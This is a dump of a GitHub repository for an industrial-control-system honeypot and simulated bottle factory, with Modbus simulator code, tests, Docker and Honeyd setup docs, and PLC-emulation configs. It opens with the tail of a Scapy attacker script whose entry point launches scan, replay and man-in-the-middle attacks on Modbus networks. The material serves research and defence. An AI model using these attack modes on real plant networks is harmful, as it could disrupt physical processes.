262 | print('# Replayed sniffed commands for {} times'.format(replay_cnt))
263 |
264 | @staticmethod
265 | def mitm_attack(mode, destination, sniff_time, error, log):
266 | ScapyAttacker.error = error
267 | if mode == "network":
268 | ScapyAttacker.inject_network(destination, sniff_time)
269 | elif mode == "link":
270 | ScapyAttacker.inject_link(destination.split(",")[0], destination.split(",")[1], sniff_time)
271 | else:
272 | raise Exception("arg \'mode\' value not recognized. Should be \'network\' or \'link\'")
273 |
274 | log.info('# Changed {} packets in the network {}:'.format(len(ScapyAttacker.sniff_commands), destination))
275 | for cmd in ScapyAttacker.sniff_commands:
276 | log.info(str(cmd))
277 |
278 |
279 | if __name__ == '__main__':
280 | parser = argparse.ArgumentParser(description='PCAP reader')
281 | parser.add_argument('--output', metavar='',
282 | help='csv file to output', required=True)
283 | parser.add_argument('--attack', metavar='determine type of attack',
284 | help='attack type could be scan, replay, mitm', required=True)
285 |
286 | parser.add_argument('--mode', metavar='network/link shows the apply mode for MITM and REPLAY attacks',
287 | type=str, default='network',
288 | help='network/link shows the apply mode for MITM and REPLAY attacks', required=False)
289 |
290 | parser.add_argument('--timeout', metavar='specify attack timeout', type=int, default=10,
291 | help='attack timeout for attacks, MitM/Replay attacks: attack seconds, scan: packets',
292 | required=False)
293 |
294 | parser.add_argument('--destination', metavar='determine attack destination',
295 | help='determine attack destination', required=False)
296 | parser.add_argument('--parameter', metavar='determine attack parameter', type=float, default=5,
297 | help='determine attack parameter', required=False)
298 |
299 | parser.parse_args()
300 | args = parser.parse_args()
301 |
302 | handler = logging.FileHandler(args.output, mode="w")
303 | handler.setFormatter(logging.Formatter('%(message)s'))
304 | logger = logging.getLogger(args.attack)
305 | logger.setLevel(logging.INFO)
306 | logger.addHandler(handler)
307 |
308 | if args.attack == 'scan':
309 | ScapyAttacker.scan_attack(args.destination, logger)
310 |
311 | if args.attack == 'replay':
312 | ScapyAttacker.replay_attack(args.mode, args.destination, args.timeout, int(args.parameter), logger)
313 |
314 | if args.attack == 'mitm':
315 | ScapyAttacker.mitm_attack(args.mode, args.destination, args.timeout, args.parameter, logger)
316 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/configs.py:
--------------------------------------------------------------------------------
1 | class SpeedConfig:
2 | # Constants
3 | SPEED_MODE_FAST = 'fast'
4 | SPEED_MODE_MEDIUM = 'medium'
5 | SPEED_MODE_SLOW = 'slow'
6 |
7 | PLC_PERIOD = {
8 | SPEED_MODE_FAST: 200,
9 | SPEED_MODE_MEDIUM: 500,
10 | SPEED_MODE_SLOW: 1000
11 | }
12 | PROCESS_PERIOD = {
13 | SPEED_MODE_FAST: 50,
14 | SPEED_MODE_MEDIUM: 100,
15 | SPEED_MODE_SLOW: 200
16 | }
17 |
18 | # you code configure SPEED_MODE
19 | SPEED_MODE = SPEED_MODE_FAST
20 |
21 | DEFAULT_PLC_PERIOD_MS = PLC_PERIOD[SPEED_MODE]
22 | DEFAULT_FP_PERIOD_MS = PROCESS_PERIOD[SPEED_MODE]
23 |
24 |
25 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/connectors.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sqlite3
3 | import memcache
4 | from abc import abstractmethod, ABC
5 | from os.path import splitext
6 |
7 | from pyModbusTCP.client import ModbusClient
8 |
9 | from ics_sim.helper import debug, error, validate_type
10 | import json
11 |
12 | from ics_sim.protocol import ClientModbus
13 |
14 |
15 | class Connector(ABC):
16 |
17 | """Base class."""
18 | def __init__(self, connection):
19 | # TODO: Check the input
20 | self._name = connection['name']
21 | self._path = connection['path']
22 | self._connection = connection
23 |
24 | @abstractmethod
25 | def initialize(self, values, clear_old=False):
26 | pass
27 |
28 | @abstractmethod
29 | def set(self, key, value):
30 | pass
31 |
32 | @abstractmethod
33 | def get(self, key):
34 | pass
35 |
36 |
37 | class SQLiteConnector(Connector):
38 | def __init__(self, connection):
39 | Connector.__init__(self, connection)
40 | self._key = 'name'
41 | self._value = 'value'
42 |
43 | def initialize(self, values, clear_old=True):
44 | if clear_old and os.path.isfile(self._path):
45 | os.remove(self._path)
46 |
47 | schema = """
48 | CREATE TABLE {} (
49 | {} TEXT NOT NULL,
50 | {} REAL,
51 | PRIMARY KEY ({})
52 | );
53 | """.format(self._name, self._key, self._value, self._key)
54 | with sqlite3.connect(self._path) as conn:
55 | conn.executescript(schema)
56 |
57 | init_template = """
58 | INSERT INTO {}""".format(self._name) + " VALUES ('{}', {});"
59 |
60 | schema_init = ""
61 | for item in values:
62 | schema_init += init_template.format(*item)
63 |
64 | with sqlite3.connect(self._path) as conn:
65 | conn.executescript(schema_init)
66 |
67 | def set(self, key, value):
68 | set_query = 'UPDATE {} SET {} = ? WHERE {} = ?'.format(
69 | self._name,
70 | self._value,
71 | self._key)
72 | with sqlite3.connect(self._path) as conn:
73 | try:
74 | cursor = conn.cursor()
75 | cursor.execute(set_query, [value, key])
76 | conn.commit()
77 | return value
78 |
79 | except sqlite3.Error as e:
80 | error('_set %s: ' % e.args[0])
81 |
82 | def get(self, key):
83 | get_query = """SELECT {} FROM {} WHERE {} = ?""".format(
84 | self._value,
85 | self._name,
86 | self._key)
87 |
88 | with sqlite3.connect(self._path) as conn:
89 | try:
90 |
91 | cursor = conn.cursor()
92 | cursor.execute(get_query, [key])
93 | record = cursor.fetchone()
94 | return record[0]
95 |
96 | except sqlite3.Error as e:
97 | error('_get %s: ' % e.args[0])
98 |
99 |
100 | class MemcacheConnector(Connector):
101 | def __init__(self, connection):
102 | Connector.__init__(self, connection)
103 | self._key = 'name'
104 | self._value = 'value'
105 | self.memcached_client = memcache.Client([self._path], debug=0)
106 |
107 |
108 | def initialize(self, values, clear_old=False):
109 | if clear_old:
110 | os.system('/etc/init.d/memcached restart')
111 |
112 | for key, value in values:
113 | self.memcached_client.set(key, value)
114 |
115 | def set(self, key, value):
116 | self.memcached_client.set(key, value)
117 |
118 | def get(self, key):
119 | return self.memcached_client.get(key)
120 |
121 | def __del__(self):
122 | self.memcached_client.disconnect_all()
123 |
124 |
125 | class HardwareConnector(Connector, ABC):
126 | def __init__(self, connection):
127 | Connector.__init__(self, connection)
128 | path = self._path
129 | self.__IP = path.split(':')[0]
130 | self.__port = path.split(':')[1]
131 | self.__clientModbus = ClientModbus(self.__IP, self.__port)
132 |
133 | def get(self, key):
134 | self.__clientModbus.receive(key)
135 |
136 | def set(self, key, value):
137 | self.__clientModbus.send(key, value)
138 |
139 |
140 | class FileConnector(Connector):
141 | def __init__(self, connection):
142 | Connector.__init__(self, connection)
143 |
144 | def initialize(self, values, clear_old=True):
145 | if not os.path.isfile(self._path):
146 | f = open(self._path, "x")
147 | obj = json.dumps(values)
148 | f.write(obj)
149 | f.close()
150 |
151 | def set(self, key, value):
152 | f = open(self._path, 'w')
153 | data = json.load(f)
154 | data[key] = value
155 | obj = json.dumps(data)
156 | f.write(obj)
157 | f.close()
158 |
159 | def get(self, key):
160 | f = open(self._path)
161 | data = json.load(f)
162 | f.close()
163 | return data[key]
164 |
165 |
166 | class ConnectorFactory:
167 | @staticmethod
168 | def build(connection):
169 | validate_type(connection, 'connection', dict)
170 |
171 | connection_keys = connection.keys()
172 | if (not connection_keys) or (len(connection_keys) != 3):
173 | raise KeyError('Connection must contain 3 keys.')
174 | else:
175 | for key in connection_keys:
176 | if (key != 'path') and (key != 'name') and (key != 'type'):
177 | raise KeyError('%s is an invalid key.' % key)
178 |
179 | if connection['type'] == 'sqlite':
180 | sub_path, extension = splitext(connection['path'])
181 | if extension == '.sqlite':
182 | return SQLiteConnector(connection)
183 | else:
184 | raise ValueError('%s is not acceptable extension for type sqlite.' % extension)
185 |
186 | elif connection['type'] == 'file':
187 | return FileConnector(connection)
188 |
189 | elif connection['type'] == 'hardware':
190 | return HardwareConnector(connection)
191 |
192 | elif connection['type'] == 'memcache':
193 | return MemcacheConnector(connection)
194 |
195 | else:
196 | raise ValueError('Connection type is not supported')
197 |
198 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/helper.py:
--------------------------------------------------------------------------------
1 | import time
2 |
3 |
4 | def validate_type(variable: str, variable_name: str, variable_type: type):
5 | if type(variable) is not variable_type:
6 | raise TypeError('{0} type is not valid for {1}.'.format(type(variable), variable_name))
7 | elif not variable_type:
8 | raise ValueError('Empty {0} is not valid.'.format(variable_name))
9 |
10 |
11 | def current_milli_time():
12 | return round(time.time() * 1000)
13 |
14 |
15 | def current_milli_cycle_time(cycle):
16 | return round(time.time() * 1000 / cycle) * cycle
17 |
18 |
19 | def debug(msg):
20 | print('DEBUG: ', msg)
21 |
22 |
23 | def error(msg):
24 | print('ERROR: ', msg)
25 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/protocol.py:
--------------------------------------------------------------------------------
1 | from pyModbusTCP.client import ModbusClient
2 | from pyModbusTCP.server import ModbusServer, DataBank
3 |
4 |
5 | class Client:
6 | def __init__(self, ip, port):
7 | self.ip = ip
8 | self.port = port
9 |
10 | def receive(self, tag_id):
11 | pass
12 |
13 | def send(self, tag_id, value):
14 | pass
15 |
16 |
17 | class Server:
18 | def __init__(self, ip, port):
19 | self.ip = ip
20 | self.port = port
21 |
22 | def start(self):
23 | pass
24 |
25 | def stop(self):
26 | pass
27 |
28 | def set(self, tag_id, value):
29 | pass
30 |
31 | def get(self, tag_id):
32 | pass
33 |
34 |
35 | class ModbusBase:
36 | def __init__(self, word_num=2, precision=4):
37 | self._precision = precision
38 | self._word_num = word_num
39 | self._precision_factor = pow(10, precision)
40 | self._base = pow(2, 16)
41 | self._max_int = pow(self._base, word_num)
42 |
43 | def decode(self, word_array):
44 |
45 | if len(word_array) != self._word_num:
46 | raise ValueError('word array length is not correct')
47 |
48 | base_holder = 1
49 | result = 0
50 |
51 | for word in word_array:
52 | result *= base_holder
53 | result += word
54 | base_holder *= self._base
55 |
56 | return result / self._precision_factor
57 |
58 | def encode(self, number):
59 |
60 | number = int(number * self._precision_factor)
61 |
62 | if number > self._max_int:
63 | raise ValueError('input number exceed max limit')
64 |
65 | result = []
66 | while number:
67 | result.append(number % self._base)
68 | number = int(number / self._base)
69 |
70 | while len(result) < self._word_num:
71 | result.append(0)
72 |
73 | result.reverse()
74 | return result
75 |
76 | def get_registers(self, index):
77 | return index * self._word_num
78 |
79 |
80 | class ClientModbus(Client, ModbusBase):
81 | def __init__(self, ip, port):
82 | ModbusBase.__init__(self)
83 | Client.__init__(self, ip, port)
84 | self.client = ModbusClient(host=self.ip, port=self.port)
85 |
86 | def receive(self, tag_id):
87 | self.open()
88 | return self.decode(self.client.read_holding_registers(self.get_registers(tag_id), self._word_num))
89 |
90 | def send(self, tag_id, value):
91 | self.open()
92 | self.client.write_multiple_registers(self.get_registers(tag_id), self.encode(value))
93 |
94 | def open(self):
95 | if not self.client.is_open:
96 | self.client.open()
97 |
98 | def close(self):
99 | if self.client.is_open:
100 | self.client.close()
101 |
102 |
103 | class ServerModbus(Server, ModbusBase):
104 | def __init__(self, ip, port):
105 | ModbusBase.__init__(self)
106 | Server.__init__(self, ip, port)
107 | self.server = ModbusServer(ip, port, no_block=True)
108 |
109 | def start(self):
110 | self.server.start()
111 |
112 | def stop(self):
113 | self.server.stop()
114 |
115 | def set(self, tag_id, value):
116 | self.server.data_bank.set_holding_registers(self.get_registers(tag_id),self.encode(value))
117 | #DataBank.set_words(self.get_registers(tag_id), self.encode(value))
118 |
119 | def get(self, tag_id):
120 | return self.decode(self.server.data_bank.get_holding_registers(self.get_registers(tag_id), self._word_num))
121 | #return self.decode(DataBank.get_words(self.get_registers(tag_id), self._word_num))
122 |
123 |
124 |
125 | class ProtocolFactory:
126 | @staticmethod
127 | def create_client(protocol, ip, port):
128 | if protocol == 'ModbusWriteRequest-TCP':
129 | return ClientModbus(ip, port)
130 | else:
131 | raise TypeError()
132 |
133 | @staticmethod
134 | def create_server(protocol, ip, port):
135 | if protocol == 'ModbusWriteRequest-TCP':
136 | return ServerModbus(ip, port)
137 | else:
138 | raise TypeError()
139 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-Attacker.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 14:56:22,261 INFO [Attacker] Created
2 | 2022-09-20 14:56:22,285 INFO [Attacker] started
3 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-AttackerMachine.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 14:56:22,717 INFO [AttackerMachine] Created
2 | 2022-09-20 14:56:22,734 INFO [AttackerMachine] started
3 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-Factory.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 14:56:12,865 INFO [Factory] Created
2 | 2022-09-20 14:56:12,944 INFO [Factory] started
3 | 2022-09-20 15:12:42,209 WARNING [Factory] water is wasting
4 | 2022-09-20 15:17:37,412 WARNING [Factory] water is wasting
5 | 2022-09-20 15:17:37,502 WARNING [Factory] water is wasting
6 | 2022-09-20 15:20:28,019 WARNING [Factory] water is wasting
7 | 2022-09-20 15:20:28,105 WARNING [Factory] water is wasting
8 | 2022-09-20 15:42:06,619 WARNING [Factory] water is wasting
9 | 2022-09-20 15:52:33,402 WARNING [Factory] water is wasting
10 | 2022-09-20 15:52:33,504 WARNING [Factory] water is wasting
11 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-HMI1.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 14:56:11,727 INFO [HMI1] Created
2 | 2022-09-20 14:56:11,780 INFO [HMI1] started
3 | 2022-09-20 15:56:08,076 WARNING [HMI1] object of type 'NoneType' has no len()
4 | 2022-09-20 15:56:51,818 WARNING [HMI1] object of type 'NoneType' has no len()
5 | 2022-09-20 15:57:43,629 WARNING [HMI1] object of type 'NoneType' has no len()
6 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-HMI2.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 12:56:14,123 INFO [HMI2] Created
2 | 2022-09-20 12:56:14,224 INFO [HMI2] started
3 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-HMI3.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 14:56:13,040 INFO [HMI3] Created
2 | 2022-09-20 14:56:13,061 INFO [HMI3] started
3 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-PLC1.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 14:56:14,471 INFO [PLC1] Created
2 | 2022-09-20 14:56:14,474 INFO [PLC1] creating the server on IP = 192.168.0.11:502
3 | 2022-09-20 14:56:14,504 INFO [PLC1] started
4 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-PLC2.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 14:56:14,446 INFO [PLC2] Created
2 | 2022-09-20 14:56:14,454 INFO [PLC2] creating the server on IP = 192.168.0.12:502
3 | 2022-09-20 14:56:14,497 INFO [PLC2] started
4 |
--------------------------------------------------------------------------------
/bottlefactory/src/start.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 | from pyModbusTCP.server import ModbusServer
4 |
5 | from Configs import TAG
6 | from HMI1 import HMI1
7 | from FactorySimulation import FactorySimulation
8 | from PLC1 import PLC1
9 | from PLC2 import PLC2
10 |
11 | import memcache
12 | from Configs import Connection, TAG
13 |
14 | from ics_sim.protocol import ProtocolFactory
15 | from ics_sim.connectors import FileConnector, ConnectorFactory
16 |
17 | factory = FactorySimulation()
18 | factory.start()
19 |
20 |
21 | plc1 = PLC1()
22 | plc1.set_record_variables(True)
23 | plc1.start()
24 |
25 |
26 | plc2 = PLC2()
27 | plc2.set_record_variables(True)
28 | plc2.start()
29 |
30 | """
31 |
32 | connector = ConnectorFactory.build(Connection.File_CONNECTION)
33 | """
34 |
35 |
36 |
37 |
38 |
39 |
40 |
--------------------------------------------------------------------------------
/bottlefactory/src/start.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 |
5 | name="$1"
6 | if [ -z "$1" ]
7 | then
8 | echo "start command need module_name to initiate!"
9 | exit 1
10 | fi
11 |
12 | if [[ $1 = "FactorySimulation.py" ]]
13 | then
14 |
15 | #IP=$(hostname -I)
16 | #IP_STR=${IP// /,}
17 | sudo memcached -d -u nobody memcached -l 127.0.0.1:11211,192.168.1.31
18 | sudo service memcached start
19 |
20 | fi
21 |
22 | if [ $1 = "PLC1.py" ] || [ $1 = "PLC2.py" ] || [ $1 = "HMI1.py" ] || [ $1 = "HMI2.py" ] || [ $1 = "HMI3.py" ] || [ $1 = "FactorySimulation.py" ]
23 | then
24 | python3 $1
25 | else
26 | echo "the is no command with name: $1"
27 | fi
28 | done
--------------------------------------------------------------------------------
/bottlefactory/src/storage/PhysicalSimulation1.sqlite:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/bottlefactory/src/storage/PhysicalSimulation1.sqlite
--------------------------------------------------------------------------------
/bottlefactory/src/tests/connectionTests.py:
--------------------------------------------------------------------------------
1 | import unittest
2 | from Configs import Connection
3 |
4 |
5 | from ics_sim.connectors import SQLiteConnector, MemcacheConnector, ConnectorFactory
6 |
7 |
8 | class ConnectionTests(unittest.TestCase):
9 |
10 | def test_sqlite_connection(self):
11 | try:
12 |
13 | connection = SQLiteConnector(Connection.SQLITE_CONNECTION)
14 |
15 | value1 = 1
16 | value2 = 2
17 |
18 | connection.initialize([('value1', value1), ('value2', value2)])
19 |
20 | retrieved_value1 = connection.get('value1')
21 | self.assertEqual(retrieved_value1, value1 , 'get function in sqliteConnection is not working correctly')
22 |
23 | value1 = 10
24 | connection.set('value1', value1)
25 | retrieved_value1 = connection.get('value1')
26 | self.assertEqual(retrieved_value1, value1, 'set function in sqliteConnection is not working correctly')
27 |
28 |
29 | except Exception:
30 | self.fail("cannot init values in the connection!")
31 |
32 | def test_memcache_connection(self):
33 | try:
34 | connection = MemcacheConnector(Connection.MEMCACHE_LOCAL_CONNECTION)
35 | value1 = 1
36 | value2 = 2
37 | connection.initialize([('value1', value1), ('value2', value2)])
38 |
39 | retrieved_value1 = connection.get('value1')
40 | self.assertEqual(retrieved_value1, value1, 'get function in MemcacheConnection is not working correctly')
41 |
42 | value1 = 10
43 | connection.set('value1', value1)
44 | retrieved_value1 = connection.get('value1')
45 | self.assertEqual(retrieved_value1, value1, 'set function in MemcacheConnection is not working correctly')
46 |
47 |
48 | except Exception:
49 | self.fail("cannot init values in the connection!")
50 |
51 | def test_connection_factory(self):
52 | try:
53 | connection = ConnectorFactory.build(Connection.MEMCACHE_LOCAL_CONNECTION)
54 | value1 = 10
55 | connection.set('value1', value1)
56 | retrieved_value1 = connection.get('value1')
57 | self.assertEqual(retrieved_value1, value1, 'set function in MemcacheConnection is not working correctly')
58 | connection = ConnectorFactory.build(Connection.SQLITE_CONNECTION)
59 | value1 = 10
60 | connection.set('value1', value1)
61 | retrieved_value1 = connection.get('value1')
62 | self.assertEqual(retrieved_value1, value1, 'set function in MemcacheConnection is not working correctly')
63 |
64 | except Exception:
65 | self.fail("cannot init values in the connection!")
66 |
--------------------------------------------------------------------------------
/bottlefactory/src/tests/modbusBaseTest.py:
--------------------------------------------------------------------------------
1 | import time
2 | import unittest
3 | from ics_sim.helper import debug
4 | from pyModbusTCP.server import ModbusServer, DataBank
5 |
6 | from ics_sim.protocol import ClientModbus, ServerModbus, ModbusBase
7 |
8 |
9 | class ProtocolTests(unittest.TestCase):
10 |
11 | def test_ModbusBase(self):
12 | modbus_base = ModbusBase()
13 |
14 | self.modbusBase_fuc(modbus_base, 0)
15 | self.modbusBase_fuc(modbus_base, .001)
16 | self.modbusBase_fuc(modbus_base, .000001)
17 | self.modbusBase_fuc(modbus_base, 1)
18 | self.modbusBase_fuc(modbus_base, 7654)
19 | self.modbusBase_fuc(modbus_base, 70000)
20 |
21 | def modbusBase_fuc(self, modbus_base, number):
22 | words = modbus_base.encode(number)
23 | new_number = modbus_base.decode(words)
24 | number = round(number, modbus_base._precision)
25 | self.assertEqual(number, new_number, 'encoding and decoding is wrong ({})'.format(number))
26 |
27 | def test_ModbusServer(self):
28 | server = ModbusServer('127.0.0.1', 5001, no_block=True)
29 | server.start()
30 | server.data_bank.set_holding_registers(5,[10])
31 | received = server.data_bank.get_holding_registers(5,1)[0]
32 | server.stop()
33 |
34 | self.assertEqual(10, received, 'server read write is not compatible')
35 |
36 | def test_ServerModbus(self):
37 | server = ServerModbus('127.0.0.1', 5001)
38 | server.start()
39 |
40 | self.server_modbus_func(0, 0, server)
41 | self.server_modbus_func(0, 10, server)
42 | self.server_modbus_func(0, 10.1, server)
43 | self.server_modbus_func(0, 10.654, server)
44 | self.server_modbus_func(0, 10.654321, server)
45 |
46 | self.server_modbus_func(5, 0, server)
47 | self.server_modbus_func(5, 10, server)
48 | self.server_modbus_func(5, 10.1, server)
49 | self.server_modbus_func(5, 10.654, server)
50 | self.server_modbus_func(5, 10.654321, server)
51 |
52 | server.stop()
53 |
54 | def server_modbus_func(self, tag_id, value, server):
55 | server.set(tag_id, value)
56 | received = server.get(tag_id)
57 | value = round(value, server._precision)
58 | self.assertEqual(value, received, 'test_ServerModbus fails on value = {}'.format(value))
59 |
60 |
61 | def test_client_server_modbus(self):
62 | client = ClientModbus('127.0.0.1', 5001)
63 | server = ServerModbus('127.0.0.1', 5001)
64 | server.start()
65 |
66 | self.client_server_modbus_func(server, client, 0, 10)
67 | self.client_server_modbus_func(server, client, 0, 0)
68 | self.client_server_modbus_func(server, client, 0, 1.2)
69 | self.client_server_modbus_func(server, client, 3, 1.2)
70 | self.client_server_modbus_func(server, client, 3, 7563.42)
71 |
72 | server.stop()
73 | client.close()
74 |
75 | def client_server_modbus_func(self, server, client, tag_id, value):
76 | server.set(tag_id, value)
77 | received = client.receive(tag_id)
78 | value = round(value, server._precision)
79 | self.assertEqual(value, received,'test_client_server_modbus fails on tag_id={} and value={}'.format(tag_id, value))
80 |
81 |
82 | if __name__ == '__main__':
83 | unittest.main()
--------------------------------------------------------------------------------
/bottlefactory/src/tests/storage/PhysicalSimulation1.sqlite:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/bottlefactory/src/tests/storage/PhysicalSimulation1.sqlite
--------------------------------------------------------------------------------
/doc/doc.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/doc/doc.md
--------------------------------------------------------------------------------
/doc/docker.md:
--------------------------------------------------------------------------------
1 | ## Install Docker using the repository
2 | 1. Update the apt package index and install packages to allow apt to use a repository over HTTPS:
3 |
4 | ``` bash
5 | sudo apt-get update
6 | sudo apt-get install \
7 | ca-certificates \
8 | curl \
9 | gnupg \
10 | lsb-release
11 | ```
12 |
13 |
14 | 2. Add Docker’s official GPG key:
15 |
16 | ``` shell
17 |
18 | sudo mkdir -p /etc/apt/keyrings
19 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg
20 | ```
21 |
22 | 3. Use the following command to set up the repository:
23 |
24 |
25 | ``` bash
26 | echo \
27 | "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu \
28 | $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
29 |
30 | ```
31 | 4. Update the apt package index:
32 | ```bash
33 | sudo apt-get update
34 | Receiving a GPG error when running apt-get update?
35 |
36 | #Your default umask may be incorrectly configured, preventing detection of the repository public key file. Try granting read permission for the Docker public key file before updating the package index:
37 |
38 | sudo chmod a+r /etc/apt/keyrings/docker.gpg
39 | sudo apt-get update
40 | ```
41 |
42 | 5. Install Docker Engine, containers, and Docker Compose.
43 | ``` bash
44 | sudo apt-get install docker-ce docker-ce-cli containerd.io docker-compose-plugin docker-compose
45 | ```
46 | If you got permission denied while trying to connect to the Docker daemon socket
47 |
48 | ``` bash
49 | sudo chmod 666 /var/run/docker.sock
50 | ```
51 |
52 | 6. Create the Docker network.
53 |
54 | Docker network for icsnet
55 |
56 | ``` bash
57 | docker network create --driver=bridge --subnet=192.168.0.0/24 --gateway=192.168.0.1 --opt com.docker.network.bridge.name=br_icsnet icsnet
58 |
59 | ```
60 | Docker network for phynet
61 | ``` bash
62 | docker network create --driver=bridge --subnet=192.168.1.0/24 --gateway=192.168.1.1 --opt com.docker.network.bridge.name=br_phynet phynet
63 | ```
--------------------------------------------------------------------------------
/doc/honeyd.md:
--------------------------------------------------------------------------------
1 | sudo docker run -v path/to/log:/app/logs/ -p "ports" honeypot
--------------------------------------------------------------------------------
/doc/icssim.md:
--------------------------------------------------------------------------------
1 | # Installation of ICSSIM
2 | ===========================================
3 |
4 | ``` bash
5 | cd bottlefactory
6 |
7 | #DOCKER_COMPOSE UP
8 | sudo docker-compose up -d
9 |
10 |
11 |
12 | ```
--------------------------------------------------------------------------------
/doc/images/VirtuePot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/doc/images/VirtuePot.png
--------------------------------------------------------------------------------
/doc/images/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/doc/images/logo.png
--------------------------------------------------------------------------------
/doc/openplc.md:
--------------------------------------------------------------------------------
1 | ## Install [OpenPLC_V2](https://github.com/thiagoralves/OpenPLC_v2) on Docker
2 |
3 | **http://www.openplcproject.com/**
4 |
5 | ``` bash
6 | cd OpenPLC
7 | docker build -t openplc .
8 | #docker network create --subnet=172.25.0.0/16 mynet
9 | #docker pull nikhilkc96/openplc
10 | docker run -d --rm --privileged -p 8080:8080 -p 502:502 --net icsnet --ip 192.168.0.40 openplc
11 | ```
12 |
--------------------------------------------------------------------------------
/doc/scada.md:
--------------------------------------------------------------------------------
1 | # Installation of SCADA
2 | ===========================================
3 |
4 | ``` bash
5 | cd scada
6 |
7 | #DOCKER_COMPOSE UP
8 | sudo docker-compose up -d
9 |
10 | ```
--------------------------------------------------------------------------------
/doc/zeek.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/doc/zeek.md
--------------------------------------------------------------------------------
/honeyd/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:xenial
2 |
3 | RUN apt-get update
4 | RUN apt-get install -y build-essential \
5 | libpcap-dev \
6 | libdnet-dev \
7 | libevent-dev \
8 | libpcre3-dev \
9 | make \
10 | bzip2 \
11 | nmap \
12 | psmisc \
13 | libtool \
14 | libdumbnet-dev \
15 | zlib1g-dev \
16 | rrdtool \
17 | net-tools \
18 | git-core \
19 | libreadline-dev \
20 | libedit-dev \
21 | bison \
22 | flex \
23 | farpd \
24 | lftp \
25 | iputils-ping \
26 | sudo \
27 | automake
28 |
29 | RUN git clone https://github.com/DataSoft/Honeyd.git
30 | RUN cd Honeyd \
31 | && ./autogen.sh \
32 | && ./configure \
33 | && make \
34 | && make install
35 |
36 |
37 | RUN apt-get clean && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
38 |
39 |
40 | RUN mkdir -p /app/logs
41 | RUN touch "/app/logs/test.log"
42 | RUN ls -alh /app
43 | RUN ip a
44 |
45 | ADD honeyd.conf .
46 | # ADD Siemens-S7-1200.py .
47 | # # Ports
48 | # EXPOSE 502 102
49 | ADD libsnap7.so /usr/lib/libsnap7.so
50 | ADD s7commServer /usr/share/honeyd/s7commServer
51 | RUN chmod 777 /usr/share/honeyd/s7commServer
52 | # CMD ["honeyd", "-d", "-i", "eth0", "-f", "honeyd.conf", "-l", "/app/logs/test.log"]
53 | #"-d", "-f", "honeyd.conf", "-l", "/app/logs/test.log"]
54 |
55 |
--------------------------------------------------------------------------------
/honeyd/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: "3.9"
2 | services:
3 | honeyd:
4 | build: .
5 | privileged: true
6 | entrypoint: ["honeyd", "-d", "-i", "eth0", "-f", "honeyd.conf", "-l", "/app/logs/test.log"]
7 | container_name: honeyd
8 | volumes:
9 | - src:/app/logs/
10 | ports:
11 | - 505:502
12 | - 102:102
13 | networks:
14 | fnet:
15 | ipv4_address: 192.168.1.32
16 |
17 |
18 | networks:
19 | wnet:
20 | driver: bridge
21 | name: icsnet
22 | ipam:
23 | config:
24 | - subnet: 192.168.0.0/24
25 | gateway: 192.168.0.1
26 | driver_opts:
27 | com.docker.network.bridge.name: br_icsnet
28 | fnet:
29 | driver: bridge
30 | name: phynet
31 | ipam:
32 | config:
33 | - subnet: 192.168.1.0/24
34 | gateway: 192.168.1.1
35 | driver_opts:
36 | com.docker.network.bridge.name: br_phynet
37 |
38 |
39 | volumes:
40 | src:
--------------------------------------------------------------------------------
/honeyd/honeyd.conf:
--------------------------------------------------------------------------------
1 | create schneider_m221
2 | set schneider_m221 personality "Schneider Electric TSX ETY programmable logic controller"
3 | set schneider_m221 default tcp action reset
4 | add schneider_m221 tcp port 502 proxy 0.0.0.0:502
5 | set schneider_m221 default icmp action open
6 | set schneider_m221 ethernet "28:29:86:F9:7C:6E"
7 | bind 192.168.1.168 schneider_m221
8 |
9 | create siemens_s7_300
10 | set siemens_s7_300 personality "Siemens Simatic 300 programmable logic controller"
11 | set siemens_s7_300 default tcp action reset
12 | add siemens_s7_300 subsystem "/usr/share/honeyd/s7commServer" shared restart
13 | set siemens_s7_300 default icmp action open
14 | set siemens_s7_300 ethernet "00:1C:06:0C:2E:C6"
15 | bind 192.168.1.169 siemens_s7_300
16 |
17 | create allen_bardley_plc5
